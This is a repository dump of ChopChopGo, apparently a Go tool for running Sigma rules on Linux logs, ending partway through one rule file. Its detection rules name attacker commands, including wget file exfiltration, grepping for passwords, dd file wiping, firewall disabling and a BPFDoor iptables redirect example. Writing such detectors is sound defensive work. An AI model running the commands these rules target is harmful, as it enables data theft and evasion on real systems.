├── LICENSE ├── Makefile ├── README.md ├── go.mod ├── go.sum ├── main.go ├── maps ├── auditd │ └── auditd.go ├── journald │ ├── journald.go │ └── stub.go └── syslog │ └── syslog.go ├── rules └── linux │ ├── auditd │ ├── lnx_auditd_audio_capture.yml │ ├── lnx_auditd_auditing_config_change.yml │ ├── lnx_auditd_binary_padding.yml │ ├── lnx_auditd_bpfdoor_file_accessed.yml │ ├── lnx_auditd_bpfdoor_port_redirect.yml │ ├── lnx_auditd_capabilities_discovery.yml │ ├── lnx_auditd_change_file_time_attr.yml │ ├── lnx_auditd_chattr_immutable_removal.yml │ ├── lnx_auditd_clipboard_collection.yml │ ├── lnx_auditd_clipboard_image_collection.yml │ ├── lnx_auditd_coinminer.yml │ ├── lnx_auditd_create_account.yml │ ├── lnx_auditd_data_compressed.yml │ ├── lnx_auditd_data_exfil_wget.yml │ ├── lnx_auditd_dd_delete_file.yml │ ├── lnx_auditd_disable_system_firewall.yml │ ├── lnx_auditd_file_or_folder_permissions.yml │ ├── lnx_auditd_find_cred_in_files.yml │ ├── lnx_auditd_hidden_binary_execution.yml │ ├── lnx_auditd_hidden_files_directories.yml │ ├── lnx_auditd_hidden_zip_files_steganography.yml │ ├── lnx_auditd_keylogging_with_pam_d.yml │ ├── lnx_auditd_ld_so_preload_mod.yml │ ├── lnx_auditd_load_module_insmod.yml │ ├── lnx_auditd_logging_config_change.yml │ ├── lnx_auditd_masquerading_crond.yml │ ├── lnx_auditd_modify_system_firewall.yml │ ├── lnx_auditd_network_service_scanning.yml │ ├── lnx_auditd_network_sniffing.yml │ ├── lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml │ ├── lnx_auditd_password_policy_discovery.yml │ ├── lnx_auditd_pers_systemd_reload.yml │ ├── lnx_auditd_screencapture_import.yml │ ├── lnx_auditd_screencaputre_xwd.yml │ ├── lnx_auditd_split_file_into_pieces.yml │ ├── lnx_auditd_steghide_embed_steganography.yml │ ├── lnx_auditd_steghide_extract_steganography.yml │ ├── lnx_auditd_susp_c2_commands.yml │ ├── lnx_auditd_susp_cmds.yml │ ├── lnx_auditd_susp_exe_folders.yml │ ├── lnx_auditd_susp_histfile_operations.yml │ ├── 
lnx_auditd_system_info_discovery.yml │ ├── lnx_auditd_system_info_discovery2.yml │ ├── lnx_auditd_system_shutdown_reboot.yml │ ├── lnx_auditd_systemd_service_creation.yml │ ├── lnx_auditd_unix_shell_configuration_modification.yml │ ├── lnx_auditd_unzip_hidden_zip_files_steganography.yml │ ├── lnx_auditd_user_discovery.yml │ └── lnx_auditd_web_rce.yml │ ├── builtin │ ├── auth │ │ └── lnx_auth_pwnkit_local_privilege_escalation.yml │ ├── clamav │ │ └── lnx_clamav_relevant_message.yml │ ├── cron │ │ └── lnx_cron_crontab_file_modification.yml │ ├── guacamole │ │ └── lnx_guacamole_susp_guacamole.yml │ ├── lnx_apt_equationgroup_lnx.yml │ ├── lnx_buffer_overflows.yml │ ├── lnx_clear_syslog.yml │ ├── lnx_file_copy.yml │ ├── lnx_ldso_preload_injection.yml │ ├── lnx_nimbuspwn_privilege_escalation_exploit.yml │ ├── lnx_potential_susp_ebpf_activity.yml │ ├── lnx_privileged_user_creation.yml │ ├── lnx_shell_clear_cmd_history.yml │ ├── lnx_shell_susp_commands.yml │ ├── lnx_shell_susp_log_entries.yml │ ├── lnx_shell_susp_rev_shells.yml │ ├── lnx_shellshock.yml │ ├── lnx_space_after_filename_.yml │ ├── lnx_susp_dev_tcp.yml │ ├── lnx_susp_jexboss.yml │ ├── lnx_symlink_etc_passwd.yml │ ├── sshd │ │ ├── lnx_sshd_ssh_cve_2018_15473.yml │ │ └── lnx_sshd_susp_ssh.yml │ ├── sudo │ │ └── lnx_sudo_cve_2019_14287_user.yml │ ├── syslog │ │ ├── lnx_syslog_security_tools_disabling_syslog.yml │ │ └── lnx_syslog_susp_named.yml │ └── vsftpd │ │ └── lnx_vsftpd_susp_error_messages.yml │ ├── file_event │ ├── file_event_lnx_doas_conf_creation.yml │ ├── file_event_lnx_persistence_cron_files.yml │ ├── file_event_lnx_persistence_sudoers_files.yml │ ├── file_event_lnx_susp_shell_script_under_profile_directory.yml │ ├── file_event_lnx_triple_cross_rootkit_lock_file.yml │ ├── file_event_lnx_triple_cross_rootkit_persistence.yml │ └── file_event_lnx_wget_download_file_in_tmp_dir.yml │ ├── network_connection │ ├── net_connection_lnx_back_connect_shell_dev.yml │ ├── 
net_connection_lnx_crypto_mining_indicators.yml │ └── net_connection_lnx_ngrok_tunnel.yml │ └── process_creation │ ├── proc_creation_lnx_at_command.yml │ ├── proc_creation_lnx_base64_decode.yml │ ├── proc_creation_lnx_base64_execution.yml │ ├── proc_creation_lnx_base64_shebang_cli.yml │ ├── proc_creation_lnx_bash_interactive_shell.yml │ ├── proc_creation_lnx_bpf_kprob_tracing_enabled.yml │ ├── proc_creation_lnx_bpftrace_unsafe_option_usage.yml │ ├── proc_creation_lnx_capa_discovery.yml │ ├── proc_creation_lnx_cat_sudoers.yml │ ├── proc_creation_lnx_chattr_immutable_removal.yml │ ├── proc_creation_lnx_clear_logs.yml │ ├── proc_creation_lnx_clear_syslog.yml │ ├── proc_creation_lnx_clipboard_collection.yml │ ├── proc_creation_lnx_cp_passwd_or_shadow_tmp.yml │ ├── proc_creation_lnx_crontab_enumeration.yml │ ├── proc_creation_lnx_crontab_removal.yml │ ├── proc_creation_lnx_crypto_mining.yml │ ├── proc_creation_lnx_curl_usage.yml │ ├── proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml │ ├── proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml │ ├── proc_creation_lnx_dd_file_overwrite.yml │ ├── proc_creation_lnx_disable_ufw.yml │ ├── proc_creation_lnx_doas_execution.yml │ ├── proc_creation_lnx_esxcli_network_discovery.yml │ ├── proc_creation_lnx_esxcli_permission_change_admin.yml │ ├── proc_creation_lnx_esxcli_storage_discovery.yml │ ├── proc_creation_lnx_esxcli_syslog_config_change.yml │ ├── proc_creation_lnx_esxcli_system_discovery.yml │ ├── proc_creation_lnx_esxcli_user_account_creation.yml │ ├── proc_creation_lnx_esxcli_vm_discovery.yml │ ├── proc_creation_lnx_esxcli_vm_kill.yml │ ├── proc_creation_lnx_esxcli_vsan_discovery.yml │ ├── proc_creation_lnx_file_and_directory_discovery.yml │ ├── proc_creation_lnx_file_deletion.yml │ ├── proc_creation_lnx_grep_os_arch_discovery.yml │ ├── proc_creation_lnx_groupdel.yml │ ├── proc_creation_lnx_gtfobin_apt.yml │ ├── proc_creation_lnx_gtfobin_vim.yml │ ├── proc_creation_lnx_install_root_certificate.yml │ 
├── proc_creation_lnx_install_suspicioua_packages.yml │ ├── proc_creation_lnx_iptables_flush_ufw.yml │ ├── proc_creation_lnx_kill_process.yml │ ├── proc_creation_lnx_local_account.yml │ ├── proc_creation_lnx_local_groups.yml │ ├── proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml │ ├── proc_creation_lnx_mkfifo_named_pipe_creation.yml │ ├── proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml │ ├── proc_creation_lnx_mount_hidepid.yml │ ├── proc_creation_lnx_netcat_reverse_shell.yml │ ├── proc_creation_lnx_nohup.yml │ ├── proc_creation_lnx_nohup_susp_execution.yml │ ├── proc_creation_lnx_omigod_scx_runasprovider_executescript.yml │ ├── proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml │ ├── proc_creation_lnx_perl_reverse_shell.yml │ ├── proc_creation_lnx_php_reverse_shell.yml │ ├── proc_creation_lnx_process_discovery.yml │ ├── proc_creation_lnx_proxy_connection.yml │ ├── proc_creation_lnx_python_pty_spawn.yml │ ├── proc_creation_lnx_python_reverse_shell.yml │ ├── proc_creation_lnx_remote_system_discovery.yml │ ├── proc_creation_lnx_remove_package.yml │ ├── proc_creation_lnx_ruby_reverse_shell.yml │ ├── proc_creation_lnx_schedule_task_job_cron.yml │ ├── proc_creation_lnx_security_software_discovery.yml │ ├── proc_creation_lnx_security_tools_disabling.yml │ ├── proc_creation_lnx_services_stop_and_disable.yml │ ├── proc_creation_lnx_setgid_setuid.yml │ ├── proc_creation_lnx_ssm_agent_abuse.yml │ ├── proc_creation_lnx_sudo_cve_2019_14287.yml │ ├── proc_creation_lnx_susp_chmod_directories.yml │ ├── proc_creation_lnx_susp_container_residence_discovery.yml │ ├── proc_creation_lnx_susp_curl_fileupload.yml │ ├── proc_creation_lnx_susp_curl_useragent.yml │ ├── proc_creation_lnx_susp_dockerenv_recon.yml │ ├── proc_creation_lnx_susp_execution_tmp_folder.yml │ ├── proc_creation_lnx_susp_find_execution.yml │ ├── proc_creation_lnx_susp_git_clone.yml │ ├── proc_creation_lnx_susp_history_delete.yml │ ├── proc_creation_lnx_susp_history_recon.yml │ 
├── proc_creation_lnx_susp_hktl_execution.yml │ ├── proc_creation_lnx_susp_inod_listing.yml │ ├── proc_creation_lnx_susp_interactive_bash.yml │ ├── proc_creation_lnx_susp_java_children.yml │ ├── proc_creation_lnx_susp_network_utilities_execution.yml │ ├── proc_creation_lnx_susp_pipe_shell.yml │ ├── proc_creation_lnx_susp_recon_indicators.yml │ ├── proc_creation_lnx_susp_sensitive_file_access.yml │ ├── proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml │ ├── proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml │ ├── proc_creation_lnx_system_info_discovery.yml │ ├── proc_creation_lnx_system_network_connections_discovery.yml │ ├── proc_creation_lnx_system_network_discovery.yml │ ├── proc_creation_lnx_touch_susp.yml │ ├── proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml │ ├── proc_creation_lnx_triple_cross_rootkit_install.yml │ ├── proc_creation_lnx_userdel.yml │ ├── proc_creation_lnx_usermod_susp_group.yml │ ├── proc_creation_lnx_webshell_detection.yml │ ├── proc_creation_lnx_wget_download_suspicious_directory.yml │ └── proc_creation_lnx_xterm_reverse_shell.yml └── update-rules.sh /Makefile: -------------------------------------------------------------------------------- 1 | all: init generate 2 | 3 | init: 4 | @echo "Making ChopChopGo..." 5 | #add special compiler options beyond -w later, 6 | #maybe use a packer or some sort. 7 | generate: 8 | go build -ldflags "-w" . 9 | 10 | clean: 11 | @echo "done." 12 | 13 | update-rules: 14 | ./update-rules.sh 15 | 16 | windows: 17 | GOOS=windows GOARCH=amd64 go build -ldflags "-w" . 
18 | 19 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/M00NLIG7/ChopChopGo 2 | 3 | go 1.18 4 | 5 | require ( 6 | github.com/M00NLIG7/go-sigma-rule-engine v0.0.0-20230307200103-5335d57313e3 7 | github.com/coreos/go-systemd/v22 v22.5.0 8 | github.com/olekukonko/tablewriter v0.0.5 9 | github.com/schollz/progressbar/v3 v3.13.0 10 | ) 11 | 12 | require ( 13 | github.com/gobwas/glob v0.2.3 // indirect 14 | github.com/mattn/go-runewidth v0.0.14 // indirect 15 | github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db // indirect 16 | github.com/rivo/uniseg v0.4.3 // indirect 17 | github.com/stretchr/testify v1.6.1 // indirect 18 | golang.org/x/sys v0.4.0 // indirect 19 | golang.org/x/term v0.4.0 // indirect 20 | gopkg.in/yaml.v2 v2.4.0 // indirect 21 | gopkg.in/yaml.v3 v3.0.1 // indirect 22 | ) 23 | -------------------------------------------------------------------------------- /maps/journald/stub.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | 3 | package journald 4 | 5 | import ( 6 | "log" 7 | ) 8 | 9 | func Chop(rulePath string, outputType string) interface{} { 10 | log.Fatalf("Access to journald is not supported on Windows!") 11 | return nil 12 | } 13 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_audio_capture.yml: -------------------------------------------------------------------------------- 1 | title: Audio Capture 2 | id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5 3 | status: test 4 | description: Detects attempts to record audio with arecord utility 5 | references: 6 | - https://linux.die.net/man/1/arecord 7 | - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa 8 | author: 'Pawel Mazur' 9 | date: 2021/09/04 10 | modified: 2022/10/09 11 | tags: 
12 | - attack.collection 13 | - attack.t1123 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: EXECVE 20 | a0: arecord 21 | a1: '-vv' 22 | a2: '-fdat' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_auditing_config_change.yml: -------------------------------------------------------------------------------- 1 | title: Auditing Configuration Changes on Linux Host 2 | id: 977ef627-4539-4875-adf4-ed8f780c4922 3 | status: test 4 | description: Detects changes in auditd configuration files 5 | references: 6 | - https://github.com/Neo23x0/auditd/blob/master/audit.rules 7 | - Self Experience 8 | author: Mikhail Larin, oscd.community 9 | date: 2019/10/25 10 | modified: 2021/11/27 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.006 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: PATH 20 | name: 21 | - /etc/audit/* 22 | - /etc/libaudit.conf 23 | - /etc/audisp/* 24 | condition: selection 25 | fields: 26 | - exe 27 | - comm 28 | - key 29 | falsepositives: 30 | - Legitimate administrative activity 31 | level: high 32 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_binary_padding.yml: -------------------------------------------------------------------------------- 1 | title: Binary Padding - Linux 2 | id: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba 3 | status: test 4 | description: | 5 | Adversaries may use binary padding to add junk data and change the on-disk representation of malware. 6 | This rule detects the use of dd and truncate to add junk data to a file. 
7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md 9 | author: Igor Fits, oscd.community 10 | date: 2020/10/13 11 | modified: 2023/05/03 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1027.001 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection_execve: 20 | type: 'EXECVE' 21 | keywords_truncate: 22 | '|all': 23 | - 'truncate' 24 | - '-s' 25 | keywords_dd: 26 | '|all': 27 | - 'dd' 28 | - 'if=' 29 | keywords_filter: 30 | - 'of=' 31 | condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter)) 32 | falsepositives: 33 | - Unknown 34 | level: high 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml: -------------------------------------------------------------------------------- 1 | title: BPFDoor Abnormal Process ID or Lock File Accessed 2 | id: 808146b2-9332-4d78-9416-d7e47012d83d 3 | status: test 4 | description: detects BPFDoor .lock and .pid files access in temporary file storage facility 5 | references: 6 | - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ 7 | - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor 8 | author: Rafal Piasecki 9 | date: 2022/08/10 10 | tags: 11 | - attack.execution 12 | - attack.t1106 13 | - attack.t1059 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: 'PATH' 20 | name: 21 | - /var/run/haldrund.pid 22 | - /var/run/xinetd.lock 23 | - /var/run/kdevrund.pid 24 | condition: selection 25 | falsepositives: 26 | - Unlikely 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml: -------------------------------------------------------------------------------- 1 | title: Bpfdoor 
TCP Ports Redirect 2 | id: 70b4156e-50fc-4523-aa50-c9dddf1993fc 3 | status: test 4 | description: | 5 | All TCP traffic on a particular port from the attacker is routed to a different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' 6 | The traffic looks like encrypted SSH communications going to TCP port 22, but in reality it is being directed to the shell port once it hits the iptables rule for the attacker host only. 7 | references: 8 | - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ 9 | - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor 10 | author: Rafal Piasecki 11 | date: 2022/08/10 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1562.004 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | cmd: 20 | type: 'EXECVE' 21 | a0|endswith: 'iptables' 22 | a1: '-t' 23 | a2: 'nat' 24 | keywords: 25 | - '--to-ports 42' 26 | - '--to-ports 43' 27 | condition: cmd and keywords 28 | falsepositives: 29 | - Legitimate port redirects 30 | level: medium 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_capabilities_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Linux Capabilities Discovery 2 | id: fe10751f-1995-40a5-aaa2-c97ccb4123fe 3 | status: test 4 | description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow an adversary to escalate their privileges. 
5 | references: 6 | - https://man7.org/linux/man-pages/man8/getcap.8.html 7 | - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ 8 | - https://mn3m.info/posts/suid-vs-capabilities/ 9 | - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 10 | author: 'Pawel Mazur' 11 | date: 2021/11/28 12 | modified: 2022/12/25 13 | tags: 14 | - attack.collection 15 | - attack.privilege_escalation 16 | - attack.t1123 17 | - attack.t1548 18 | logsource: 19 | product: linux 20 | service: auditd 21 | detection: 22 | selection: 23 | type: EXECVE 24 | a0: getcap 25 | a1: '-r' 26 | a2: '/' 27 | condition: selection 28 | falsepositives: 29 | - Unknown 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_change_file_time_attr.yml: -------------------------------------------------------------------------------- 1 | title: File Time Attribute Change - Linux 2 | id: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b 3 | status: test 4 | description: Detects file time attribute changes made to hide new files or changes to existing files. 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md 7 | author: 'Igor Fits, oscd.community' 8 | date: 2020/10/15 9 | modified: 2022/11/28 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.006 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | execve: 18 | type: 'EXECVE' 19 | touch: 20 | - 'touch' 21 | selection2: 22 | - '-t' 23 | - '-acmr' 24 | - '-d' 25 | - '-r' 26 | condition: execve and touch and selection2 27 | falsepositives: 28 | - Unknown 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml: -------------------------------------------------------------------------------- 1 | title: Remove Immutable File Attribute - Auditd 2 | id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 3 | status: test 4 | description: Detects removing immutable file attribute. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md 7 | author: Jakob Weinzettl, oscd.community 8 | date: 2019/09/23 9 | modified: 2022/11/26 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1222.002 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | a0|contains: 'chattr' 20 | a1|contains: '-i' 21 | condition: selection 22 | falsepositives: 23 | - Administrator interacting with immutable files (e.g. for instance backups). 
24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_clipboard_collection.yml: -------------------------------------------------------------------------------- 1 | title: Clipboard Collection with Xclip Tool - Auditd 2 | id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf 3 | status: test 4 | description: | 5 | Detects attempts to collect data stored in the clipboard from users using the xclip tool. 6 | Xclip has to be installed. 7 | Using this rule on servers is highly recommended, since clipboard utilities are heavily used on user workstations. 8 | references: 9 | - https://linux.die.net/man/1/xclip 10 | - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ 11 | author: 'Pawel Mazur' 12 | date: 2021/09/24 13 | modified: 2022/11/26 14 | tags: 15 | - attack.collection 16 | - attack.t1115 17 | logsource: 18 | product: linux 19 | service: auditd 20 | detection: 21 | selection: 22 | type: EXECVE 23 | a0: xclip 24 | a1: 25 | - '-selection' 26 | - '-sel' 27 | a2: 28 | - clipboard 29 | - clip 30 | a3: '-o' 31 | condition: selection 32 | falsepositives: 33 | - Legitimate usage of xclip tools 34 | level: low 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml: -------------------------------------------------------------------------------- 1 | title: Clipboard Collection of Image Data with Xclip Tool 2 | id: f200dc3f-b219-425d-a17e-c38467364816 3 | status: test 4 | description: | 5 | Detects attempts to collect image data stored in the clipboard from users using the xclip tool. 6 | Xclip has to be installed. 7 | Using this rule on servers is highly recommended, since clipboard utilities are heavily used on user workstations. 
8 | references: 9 | - https://linux.die.net/man/1/xclip 10 | author: 'Pawel Mazur' 11 | date: 2021/10/01 12 | modified: 2022/10/09 13 | tags: 14 | - attack.collection 15 | - attack.t1115 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection: 21 | type: EXECVE 22 | a0: xclip 23 | a1: 24 | - '-selection' 25 | - '-sel' 26 | a2: 27 | - clipboard 28 | - clip 29 | a3: '-t' 30 | a4|startswith: 'image/' 31 | a5: '-o' 32 | condition: selection 33 | falsepositives: 34 | - Legitimate usage of xclip tools 35 | level: low 36 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_coinminer.yml: -------------------------------------------------------------------------------- 1 | title: Possible Coin Miner CPU Priority Param 2 | id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed 3 | status: test 4 | description: Detects a command line parameter very often used with coin miners 5 | references: 6 | - https://xmrig.com/docs/miner/command-line-options 7 | author: Florian Roth (Nextron Systems) 8 | date: 2021/10/09 9 | modified: 2022/12/25 10 | tags: 11 | - attack.privilege_escalation 12 | - attack.t1068 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | cmd1: 18 | a1|startswith: '--cpu-priority' 19 | cmd2: 20 | a2|startswith: '--cpu-priority' 21 | cmd3: 22 | a3|startswith: '--cpu-priority' 23 | cmd4: 24 | a4|startswith: '--cpu-priority' 25 | cmd5: 26 | a5|startswith: '--cpu-priority' 27 | cmd6: 28 | a6|startswith: '--cpu-priority' 29 | cmd7: 30 | a7|startswith: '--cpu-priority' 31 | condition: 1 of cmd* 32 | falsepositives: 33 | - Other tools that use a --cpu-priority flag 34 | level: critical 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_create_account.yml: -------------------------------------------------------------------------------- 1 | title: Creation Of A User Account 2 | id: 
759d0d51-bc99-4b5e-9add-8f5b2c8e7512 3 | status: test 4 | description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. 5 | references: 6 | - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files 7 | - https://access.redhat.com/articles/4409591#audit-record-types-2 8 | - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07 9 | author: Marie Euler, Pawel Mazur 10 | date: 2020/05/18 11 | modified: 2022/12/20 12 | tags: 13 | - attack.t1136.001 14 | - attack.persistence 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection_syscall_record_type: 20 | type: 'SYSCALL' 21 | exe|endswith: '/useradd' 22 | selection_add_user_record_type: 23 | type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos 24 | condition: 1 of selection_* 25 | falsepositives: 26 | - Admin activity 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_data_compressed.yml: -------------------------------------------------------------------------------- 1 | title: Data Compressed 2 | id: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee 3 | status: test 4 | description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md 7 | author: Timur Zinniatullin, oscd.community 8 | date: 2019/10/21 9 | modified: 2023/07/28 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1560.001 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection1: 18 | type: 'execve' 19 | a0: 'zip' 20 | selection2: 21 | type: 'execve' 22 | a0: 'gzip' 23 | a1: '-k' 24 | selection3: 25 | type: 'execve' 26 | a0: 'tar' 27 | a1|contains: '-c' 28 | condition: 1 of selection* 29 | falsepositives: 30 | - Legitimate use of archiving tools by legitimate user. 31 | level: low 32 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_data_exfil_wget.yml: -------------------------------------------------------------------------------- 1 | title: Data Exfiltration with Wget 2 | id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc 3 | status: test 4 | description: | 5 | Detects attempts to post the file with the usage of wget utility. 6 | The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. 
7 | references: 8 | - https://linux.die.net/man/1/wget 9 | - https://gtfobins.github.io/gtfobins/wget/ 10 | author: 'Pawel Mazur' 11 | date: 2021/11/18 12 | modified: 2022/12/25 13 | tags: 14 | - attack.exfiltration 15 | - attack.t1048.003 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection: 21 | type: EXECVE 22 | a0: wget 23 | a1|startswith: '--post-file=' 24 | condition: selection 25 | falsepositives: 26 | - Legitimate usage of wget utility to post a file 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_dd_delete_file.yml: -------------------------------------------------------------------------------- 1 | title: Overwriting the File with Dev Zero or Null 2 | id: 37222991-11e9-4b6d-8bdf-60fbe48f753e 3 | status: stable 4 | description: Detects overwriting (effectively wiping/deleting) of a file. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md 7 | author: Jakob Weinzettl, oscd.community 8 | date: 2019/10/23 9 | tags: 10 | - attack.impact 11 | - attack.t1485 12 | logsource: 13 | product: linux 14 | service: auditd 15 | detection: 16 | selection: 17 | type: 'EXECVE' 18 | a0|contains: 'dd' 19 | a1|contains: 20 | - 'if=/dev/null' 21 | - 'if=/dev/zero' 22 | condition: selection 23 | falsepositives: 24 | - Appending null bytes to files. 25 | - Legitimate overwrite of files. 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_disable_system_firewall.yml: -------------------------------------------------------------------------------- 1 | title: Disable System Firewall 2 | id: 53059bc0-1472-438b-956a-7508a94a91f0 3 | status: test 4 | description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md 7 | - https://firewalld.org/documentation/man-pages/firewall-cmd.html 8 | author: 'Pawel Mazur' 9 | date: 2022/01/22 10 | tags: 11 | - attack.t1562.004 12 | - attack.defense_evasion 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'SERVICE_STOP' 19 | unit: 20 | - 'firewalld' 21 | - 'iptables' 22 | - 'ufw' 23 | condition: selection 24 | falsepositives: 25 | - Admin activity 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml: -------------------------------------------------------------------------------- 1 | title: File or Folder Permissions Change 2 | id: 74c01ace-0152-4094-8ae2-6fd776dd43e5 3 | status: test 4 | description: Detects file and folder permission changes. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md 7 | author: Jakob Weinzettl, oscd.community 8 | date: 2019/09/23 9 | modified: 2021/11/27 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1222.002 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | a0|contains: 20 | - 'chmod' 21 | - 'chown' 22 | condition: selection 23 | falsepositives: 24 | - User interacting with files permissions (normal/daily behaviour). 
25 | level: low 26 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_find_cred_in_files.yml: -------------------------------------------------------------------------------- 1 | title: Credentials In Files - Linux 2 | id: df3fcaea-2715-4214-99c5-0056ea59eb35 3 | status: test 4 | description: 'Detecting attempts to extract passwords with grep' 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md 7 | author: 'Igor Fits, oscd.community' 8 | date: 2020/10/15 9 | modified: 2023/04/30 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552.001 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | keywords: 20 | '|all': 21 | - 'grep' 22 | - 'password' 23 | condition: selection and keywords 24 | falsepositives: 25 | - Unknown 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml: -------------------------------------------------------------------------------- 1 | title: Use Of Hidden Paths Or Files 2 | id: 9e1bef8d-0fff-46f6-8465-9aa54e128c1e 3 | 